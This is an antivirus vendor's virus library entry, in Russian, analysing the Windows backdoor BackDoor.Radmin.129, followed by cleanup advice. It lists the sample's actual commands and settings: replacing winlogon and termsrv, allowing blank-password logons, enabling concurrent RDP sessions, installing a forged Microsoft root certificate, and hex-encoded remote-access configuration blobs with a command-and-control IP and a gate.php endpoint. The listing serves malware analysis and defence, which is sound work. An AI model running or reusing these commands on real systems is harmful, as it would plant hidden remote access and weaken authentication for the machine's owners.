ПОЛЬЗОВАТЕЛЯМ

Закрыть

Поиск

Поиск

Поддержка
Круглосуточная поддержка

Напишите

Запрос через форму

Позвоните

Бесплатно по России:
8-800-333-79-32

ЧаВо | Форум

Напишите

Задать вопрос в поддержку

Ваши запросы

  • Все: -
  • Незакрытые: -
  • Последний: -

Позвоните

Бесплатно по России:
8-800-333-79-32

Свяжитесь с нами Незакрытые запросы: 

Профиль

Профиль

BY

RU CN DE EN ES FR IT JP KZ UZ PL BY
Закрыть
Сервисы
Сканеры
Dr.Web vxCube
Демо
Экспертиза ВКИ
Вирусная библиотека
База знаний

Технологии

Термины

Обучение и просвещение

Мифы

Новости

BackDoor.Radmin.129

Добавлен в вирусную базу Dr.Web: 2013-12-03

Описание добавлено:

Техническая информация

Для обеспечения автозапуска и распространения:
Модифицирует следующие ключи реестра:
  • [<HKLM>\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify\ipnp] 'Startup' = 'WLEventStartup'
  • [<HKLM>\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify\ipnp] 'Logon' = 'WLEventLogon'
  • [<HKLM>\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify\ipnp] 'DllName' = 'ipnp.dll'
Создает следующие сервисы:
  • [<HKLM>\SYSTEM\ControlSet001\Services\FastUserSwitchingCompatibility] 'Start' = '00000002'
  • [<HKLM>\SYSTEM\ControlSet001\Services\TermService] 'Start' = '00000002'
  • [<HKLM>\SYSTEM\ControlSet001\Services\netaservice] 'Start' = '00000002'
Подменяет следующие исполняемые системные файлы:
  • <SYSTEM32>\msgina.dll файлом <SYSTEM32>\msgina.dll
  • <SYSTEM32>\csrsrv.dll файлом <SYSTEM32>\csrsrv.dll
  • <SYSTEM32>\winlogon.exe файлом <SYSTEM32>\winlogon.exe
  • <SYSTEM32>\termsrv.dll файлом <SYSTEM32>\termsrv.dll
Заражает следующие исполняемые файлы:
  • <SYSTEM32>\msgina.dll
  • <SYSTEM32>\csrsrv.dll
  • <SYSTEM32>\winlogon.exe
  • <SYSTEM32>\termsrv.dll
Вредоносные функции:
Создает и запускает на исполнение:
  • '%TEMP%\7ZipSfx.000\TERM.EXE'
  • '%WINDIR%\Dotcom\wmiprvse.exe' /tray
  • '%TEMP%\7ZipSfx.001\TASKKILL.EXE' /f /fi "modules eq termsrv.dll"
  • '%TEMP%\7ZipSfx.001\PATCH.EXE' /silent
  • '%TEMP%\7ZipSfx.001\WFP.EXE' <SYSTEM32>\winlogon.exe <SYSTEM32>\termsrv.dll <SYSTEM32>\msgina.dll <SYSTEM32>\csrsrv.dll
  • '%WINDIR%\Dotcom\wmiadap.exe' /silentinstall
  • '%TEMP%\7ZipSfx.000\SYSTEM.EXE' x -pCOyNldyU SYSTEM
  • '%WINDIR%\Dotcom\wmiadap.exe' /firewall
  • '%WINDIR%\Dotcom\wmiadap.exe'
  • '%WINDIR%\Dotcom\wmiadap.exe' /start
Запускает на исполнение:
  • '<SYSTEM32>\attrib.exe' -r -h -s <SYSTEM32>\termsrv.*
  • '<SYSTEM32>\attrib.exe' -r -h -s <SYSTEM32>\dllcache\termsrv.dll
  • '<SYSTEM32>\attrib.exe' -r -h -s <SYSTEM32>\dllcache\msgina.dll
  • '<SYSTEM32>\attrib.exe' -r -h -s <SYSTEM32>\dllcache\csrsrv.dll
  • '<SYSTEM32>\attrib.exe' -r -h -s <SYSTEM32>\msgina.*
  • '<SYSTEM32>\net1.exe' stop termservice /y
  • '<SYSTEM32>\net.exe' stop termservice /y
  • '<SYSTEM32>\sc.exe' failure dcomlaunch reset= 60 actions= ""
  • '<SYSTEM32>\attrib.exe' -r -h -s <SYSTEM32>\winlogon.*
  • '<SYSTEM32>\attrib.exe' -r -h -s <SYSTEM32>\dllcache\winlogon.exe
  • '<SYSTEM32>\attrib.exe' -r -h -s <SYSTEM32>\csrsrv.*
  • '<SYSTEM32>\svchost.exe' -k DComLaunch
  • '<SYSTEM32>\net1.exe' start termservice /y
  • '<SYSTEM32>\sc.exe' config fastuserswitchingcompatibility start= auto
  • '<SYSTEM32>\cmd.exe' /c ""%TEMP%\7ZSfx000.cmd" "
  • '<SYSTEM32>\net1.exe' start fastuserswitchingcompatibility /y
  • '<SYSTEM32>\reg.exe' add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server\Licensing Core" /v EnableConcurrentSessions /t REG_DWORD /d 0 /f
  • '<SYSTEM32>\reg.exe' add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v AllowMultiTSSession /t REG_DWORD /d 1 /f
  • '<SYSTEM32>\reg.exe' add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f
  • '<SYSTEM32>\sc.exe' config termservice start= auto
  • '<SYSTEM32>\reg.exe' add "HKLM\SYSTEM\CurrentControlSet\Control\Lsa" /v LimitBlankPasswordUse /t REG_DWORD /d 0 /f
  • '<SYSTEM32>\find.exe' "5"
  • '<SYSTEM32>\net1.exe' stop rmanservice /y
  • '<SYSTEM32>\net.exe' stop rmanservice /y
  • '<SYSTEM32>\net.exe' stop netaservice /y
  • '<SYSTEM32>\sc.exe' delete rmanservice /y
  • '<SYSTEM32>\net1.exe' stop netaservice /y
  • '<SYSTEM32>\taskkill.exe' /f /im wmiadap.exe
  • '<SYSTEM32>\cmd.exe' /c ""%TEMP%\7ZipSfx.000\INSTALL.CMD" "
  • '<SYSTEM32>\taskkill.exe' /f /im wmiprvse.exe
  • '<SYSTEM32>\tskill.exe' wmiprvse
  • '<SYSTEM32>\tskill.exe' wmiadap
  • '<SYSTEM32>\sc.exe' delete netaservice /y
  • '<SYSTEM32>\reg.exe' add HKLM\SYSTEM\System\System\Remote\Windows\Server\Parameters /f /v notification /t REG_BINARY /d FFFE3C003F0078006D006C002000760065007200730069006F006E003D00220031002E0030002200200065006E0063006F00640069006E0067003D0022005500540046002D003100360022003F003E000D000A003C0072006D0073005F0069006E00650074005F00690064005F006E006F00740069006600690063006100740069006F006E002000760065007200730069006F006E003D0022003500350030003000300022003E003C007500730065003E0074007200750065003C002F007500730065003E003C0065006D00610069006C003E007400650073007400400074006500730074002E0063006F006D003C002F0065006D00610069006C003E003C00690064003E007B00450042004300460037003000320039002D0030004400330046002D0034004100340033002D0039004300420046002D004400340046003700370046004400350034003400420041007D003C002F00690064003E003C00670065006E00650072006100740065005F006E00650077005F00700061007300730077006F00720064003E00660061006C00730065003C002F00670065006E00650072006100740065005F006E00650077005F00700061007300730077006F00720064003E003C00610073006B005F006900640065006E00740069006600690063006100740069006F006E003E00660061006C00730065003C002F00610073006B005F006900640065006E00740069006600690063006100740069006F006E003E003C00730065006E0074003E00660061006C00730065003C002F00730065006E0074003E003C00760065007200730069006F006E003E00350035003000300030003C002F00760065007200730069006F006E003E003C007000750062006C00690063005F006B00650079005F006D003E003C002F007000750062006C00690063005F006B00650079005F006D003E003C007000750062006C00690063005F006B00650079005F0065003E003C002F007000750062006C00690063005F006B00650079005F0065003E003C00700061007300730077006F00720064003E003C002F00700061007300730077006F00720064003E003C0069006E007400650072006E00650074005F00690064003E003C002F0069006E007400650072006E00650074005F00690064003E003C0064006900730063006C00610069006D00650072003E003C002F0064006900730063006C00610069006D00650072003E003C002F0072006D0073005F0069006E00650074005F00690064005F006E006F00740069006600690063006100740069006F006E003E000D000A00
  • '<SYSTEM32>\reg.exe' add HKLM\SYSTEM\System\System\Remote\Windows\Server\Parameters /f /v Options /t REG_BINARY /d 545046301154524F4D5365727665724F7074696F6E7300095573654E5441757468080D53656375726974794C6576656C020304506F727403121614456E61626C654F7665726C617943617074757265080C53686F775472617949636F6E080642696E644950060D416E7920696E746572666163651343616C6C6261636B4175746F436F6E6E656374091743616C6C6261636B436F6E6E656374496E74657276616C023C0C50617373776F726444617461060C3665322B76777778394B453D084869646553746F70080C497046696C7465725479706502021750726F7465637443616C6C6261636B53657474696E6773091550726F74656374496E6574496453657474696E6773090F446F4E6F7443617074757265524450080755736549507636091141736B557365725065726D697373696F6E0816557365725065726D697373696F6E496E74657276616C031027134175746F416C6C6F775065726D697373696F6E08134E656564417574686F72697479536572766572081F41736B5065726D697373696F6E4F6E6C794966557365724C6F676765644F6E0811557365496E6574436F6E6E656374696F6E080A496E6574536572766572060C352E33342E3234342E31353013557365437573746F6D496E6574536572766572090A496E65744964506F72740317160D557365496E6574496449507636081444697361626C6552656D6F7465436F6E74726F6C081344697361626C6552656D6F746553637265656E081344697361626C6546696C655472616E73666572080F44697361626C655265646972656374080D44697361626C6554656C6E6574081444697361626C6552656D6F746545786563757465081244697361626C655461736B4D616E61676572080E44697361626C654F7665726C6179080F44697361626C6553687574646F776E081444697361626C6552656D6F746555706772616465081544697361626C655072657669657743617074757265081444697361626C654465766963654D616E61676572080B44697361626C6543686174081344697361626C6553637265656E5265636F7264081044697361626C65415643617074757265081244697361626C6553656E644D657373616765080F44697361626C655265676973747279080D44697361626C65415643686174081544697361626C6552656D6F746553657474696E6773081544697361626C6552656D6F74655072696E74696E67080A44697361626C65526470080F4E6F7469667953686F7750616E656C08144E6F746966794368616E67655472617949636F6E08104E6F7469667942616C6C6F6E48696E74080F4E6F74696679506C6179536F756E6408064C6F6755736508055369644964061034313537382E393039343539343434340D50726F787953657474696E67731426010000EFBBBF3C3F786D6C2076657273696F6E3D22312E302220656E636F64696E673D225554462D3136223F3E0D0A3C70726F78795F73657474696E67732076657273696F6E3D223535303030223E3C7573655F70726F78793E66616C73653C2F7573655F70726F78793E3C70726F78795F747970653E303C2F70726F78795F747970653E3C686F73743E3C2F686F73743E3C706F72743E383038303C2F706F72743E3C6E6565645F617574683E66616C73653C2F6E6565645F617574683E3C6E746D6C5F617574683E66616C73653C2F6E746D6C5F617574683E3C757365726E616D653E3C2F757365726E616D653E3C70617373776F72643E3C2F70617373776F72643E3C646F6D61696E3E3C2F646F6D61696E3E3C2F70726F78795F73657474696E67733E0D0A0A4164646974696F6E616C0604303931321144697361626C65496E7465726E65744964080B536166654D6F6465536574080000
  • '<SYSTEM32>\reg.exe' add HKLM\SYSTEM\System\System\Remote\Windows\Server\Parameters /f /v Password /t REG_BINARY /d 31003100350042003700300032004600380038004200350044003500300034004100440041003300360031003400420031004400360037004400450046003700450036003500340039004500350032003000410044004100410044003600320045004300310034003400420039003800380045003300430033004200390031004500380041003200360036004500300030003000330033003400310036004200390042003300330031004300410031004400300037003100340030004200460044004500340039004400390034004100370043003100420039004600450039004600300039003700320038004400360044003900310042004600300032003200
  • '<SYSTEM32>\reg.exe' query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion" /v "CurrentVersion"
  • '<SYSTEM32>\cmd.exe' /c ""%TEMP%\7ZipSfx.001\TERM.CMD" "
  • '<SYSTEM32>\attrib.exe' -h -s -r "%APPDATA%\Microsoft\System"
  • '<SYSTEM32>\attrib.exe' -h -s -r "%WINDIR%\Dotcom"
  • '<SYSTEM32>\net1.exe' session
  • '<SYSTEM32>\attrib.exe' +h +s +r "%WINDIR%\Dotcom"
  • '<SYSTEM32>\reg.exe' add "HKLM\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\9ED956AE810CE03BF85A7399C624E061E694708C" /f /v "Blob" /t REG_BINARY /d 0300000001000000140000009ed956ae810ce03bf85a7399c624e061e694708c20000000010000004602000030820242308201afa0030201020210316a9f5e8966c38340a1b543b6d7ace0300906052b0e03021d05003029312730250603550403131e4d6963726f736f667420536f66747761726520436f72706f726174696f6e301e170d3133313130313136343532375a170d3339313233313233353935395a3029312730250603550403131e4d6963726f736f667420536f66747761726520436f72706f726174696f6e30819f300d06092a864886f70d010101050003818d0030818902818100d721ecda55689cdaaf953552c86d2f9aaf9d2647bd2940d1a4ad2b34b46911d0534aa9c9f2cff93f2eddf9729043c494740e42063278105db3dffa6ee46778428675612b38bf2a6ed06d795996a920c5f7cac3b071b6896079ac27be4248027736cc47a09f8a4bca6d190ef23ee3abc63dabf99a89e811d037793f34abe1869b0203010001a373307130130603551d25040c300a06082b06010505070303305a0603551d01045330518010eed063e8861902f2f7cb6f4a9f4eb10da12b3029312730250603550403131e4d6963726f736f667420536f66747761726520436f72706f726174696f6e8210316a9f5e8966c38340a1b543b6d7ace0300906052b0e03021d0500038181000618774e268aed60f79bd0f0484a188162b23fcc02f1eed9c78ed1b1453b4afcddbbcd27bbca69b281f4777166e56b536ff228b4d7fa13b4da6c4ae7ae11d14969a8c9dade435977650fb758e2c0c3b8346287bab11338946b68dcee60c704d1d39c3ca233e503db3e695f22534ceee23027f0405dab60178691eff9c95bc816
Завершает или пытается завершить
следующие системные процессы:
  • <SYSTEM32>\svchost.exe
Изменения в файловой системе:
Создает следующие файлы:
  • %WINDIR%\Dotcom\dsfvorbisencoder.dll
  • <SYSTEM32>\ipnp.dll
  • %TEMP%\7ZipSfx.001\TERM.CMD
  • %WINDIR%\Dotcom\dsfvorbisdecoder.dll
  • %WINDIR%\Dotcom\ipnm.dll
  • %WINDIR%\Dotcom\vp8encoder.dll
  • %WINDIR%\Dotcom\vp8decoder.dll
  • %TEMP%\7ZipSfx.001\TASKKILL.EXE
  • %TEMP%\7ZipSfx.001\RDPCLIPV.EXE
  • %TEMP%\7ZSfx000.cmd
  • %TEMP%\7ZipSfx.001\RDPCLIP7.EXE
  • %TEMP%\7ZipSfx.001\WFP.EXE
  • %TEMP%\7ZipSfx.001\PATCH.EXE
  • %TEMP%\7ZipSfx.001\DEVCON.EXE
  • %TEMP%\7ZipSfx.000\wmiprvse.exe
  • %TEMP%\7ZipSfx.000\dsfvorbisdecoder.dll
  • %TEMP%\7ZipSfx.000\dsfvorbisencoder.dll
  • %TEMP%\7ZipSfx.000\wmiadap.exe
  • %TEMP%\7ZipSfx.000\SYSTEM
  • %TEMP%\7ZipSfx.000\INSTALL.CMD
  • %TEMP%\7ZipSfx.000\TERM.EXE
  • %WINDIR%\Dotcom\wmiadap.exe
  • %WINDIR%\Dotcom\wmiprvse.exe
  • %WINDIR%\Dotcom\ipnp.dll
  • %TEMP%\7ZipSfx.000\vp8encoder.dll
  • %TEMP%\7ZipSfx.000\ipnm.dll
  • %TEMP%\7ZipSfx.000\ipnp.dll
  • %TEMP%\7ZipSfx.000\vp8decoder.dll
Удаляет следующие файлы:
  • %TEMP%\7ZipSfx.000\INSTALL.CMD
  • %TEMP%\7ZipSfx.000\ipnm.dll
  • %TEMP%\7ZipSfx.000\ipnp.dll
  • %TEMP%\7ZSfx000.cmd
  • %TEMP%\7ZipSfx.000\dsfvorbisdecoder.dll
  • %TEMP%\7ZipSfx.000\dsfvorbisencoder.dll
  • %TEMP%\7ZipSfx.000\vp8encoder.dll
  • %TEMP%\7ZipSfx.000\wmiadap.exe
  • %TEMP%\7ZipSfx.000\wmiprvse.exe
  • %TEMP%\7ZipSfx.000\SYSTEM
  • %TEMP%\7ZipSfx.000\SYSTEM.EXE
  • %TEMP%\7ZipSfx.000\vp8decoder.dll
  • <SYSTEM32>\dllcache\csrsrv.dll
  • %TEMP%\7ZipSfx.001\DEVCON.EXE
  • %TEMP%\7ZipSfx.001\PATCH.EXE
  • <SYSTEM32>\dllcache\winlogon.exe
  • <SYSTEM32>\dllcache\termsrv.dll
  • <SYSTEM32>\dllcache\msgina.dll
  • %TEMP%\7ZipSfx.001\TERM.CMD
  • %TEMP%\7ZipSfx.001\WFP.EXE
  • %TEMP%\7ZipSfx.000\TERM.EXE
  • %TEMP%\7ZipSfx.001\RDPCLIP7.EXE
  • %TEMP%\7ZipSfx.001\RDPCLIPV.EXE
  • %TEMP%\7ZipSfx.001\TASKKILL.EXE
Перемещает следующие системные файлы:
  • <SYSTEM32>\msgina.dll в <SYSTEM32>\msgina.tmp
  • <SYSTEM32>\csrsrv.dll в <SYSTEM32>\csrsrv.tmp
  • <SYSTEM32>\winlogon.exe в <SYSTEM32>\winlogon.tmp
  • <SYSTEM32>\termsrv.dll в <SYSTEM32>\termsrv.tmp
Самоудаляется.
Сетевая активность:
Подключается к:
  • '5.##.244.150':5655
  • 'rs####k-release.net':80
TCP:
Запросы HTTP GET:
  • rs####k-release.net/update/gate.php?te####
Запросы HTTP POST:
  • rs####k-release.net/update/gate.php
UDP:
  • DNS ASK rs####k-release.net
Другое:
Ищет следующие окна:
  • ClassName: '(null)' WindowName: '(null)'

Рекомендации по лечению

  1. В случае если операционная система способна загрузиться (в штатном режиме или режиме защиты от сбоев), скачайте лечащую утилиту Dr.Web CureIt! и выполните с ее помощью полную проверку вашего компьютера, а также используемых вами переносных носителей информации.
  2. Если загрузка операционной системы невозможна, измените настройки BIOS вашего компьютера, чтобы обеспечить возможность загрузки ПК с компакт-диска или USB-накопителя. Скачайте образ аварийного диска восстановления системы Dr.Web® LiveDisk или утилиту записи Dr.Web® LiveDisk на USB-накопитель, подготовьте соответствующий носитель. Загрузив компьютер с использованием данного носителя, выполните его полную проверку и лечение обнаруженных угроз.
Демо бесплатно

 

Скачать Dr.Web

По серийному номеру

Выполните полную проверку системы с использованием Антивируса Dr.Web Light для macOS. Данный продукт можно загрузить с официального сайта Apple App Store.

Демо бесплатно

 

Скачать Dr.Web

По серийному номеру

Скачать Dr.Web с Apple Store

На загруженной ОС выполните полную проверку всех дисковых разделов с использованием продукта Антивирус Dr.Web для Linux.

Демо бесплатно

 

Скачать Dr.Web

По серийному номеру

  1. Если мобильное устройство функционирует в штатном режиме, загрузите и установите на него бесплатный антивирусный продукт Dr.Web для Android Light. Выполните полную проверку системы и используйте рекомендации по нейтрализации обнаруженных угроз.
  2. Если мобильное устройство заблокировано троянцем-вымогателем семейства Android.Locker (на экране отображается обвинение в нарушении закона, требование выплаты определенной денежной суммы или иное сообщение, мешающее нормальной работе с устройством), выполните следующие действия:
    • загрузите свой смартфон или планшет в безопасном режиме (в зависимости от версии операционной системы и особенностей конкретного мобильного устройства эта процедура может быть выполнена различными способами; обратитесь за уточнением к инструкции, поставляемой вместе с приобретенным аппаратом, или напрямую к его производителю);
    • после активации безопасного режима установите на зараженное устройство бесплатный антивирусный продукт Dr.Web для Android Light и произведите полную проверку системы, выполнив рекомендации по нейтрализации обнаруженных угроз;
    • выключите устройство и включите его в обычном режиме.

Подробнее о Dr.Web для Android

Демо бесплатно на 14 дней

Выдаётся при установке

Скачать с сайта
Скачать с Google Play